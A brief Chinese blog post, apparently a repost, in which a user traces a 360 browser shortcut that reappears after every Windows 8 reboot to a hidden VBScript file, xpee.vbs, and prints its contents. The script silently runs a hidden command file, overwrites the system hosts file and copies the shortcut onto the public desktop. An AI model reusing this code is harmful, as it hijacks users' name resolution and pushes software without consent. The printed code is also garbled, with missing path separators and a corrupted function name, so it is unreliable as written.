xpee.vbs

xpee.vbs

 Win 8安装之后每一次重启桌面都会有一个360浏览器的快捷方式,终于找到原因了,

在Windows/System下面有这么个文件;

Set ws = CreateObject("Wscript.Shell") 
ws.run "cmd /c xpee.cmd",vbhide
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.GetFile("C:WINDOWSsystemhosts")
MyFile.Copy ("C:WINDOWSsystem32driversetchosts")

Set fso = Creatxpee.vbseObject("Scripting.FileSystemObject")
Set MyFile = fso.GetFile("C:WINDOWSsystem360安全浏览器7.lnk")
MyFile.Copy ("C:UsersPublicDesktop360安全浏览器7.lnk")
原文地址:https://www.cnblogs.com/stono/p/6847917.html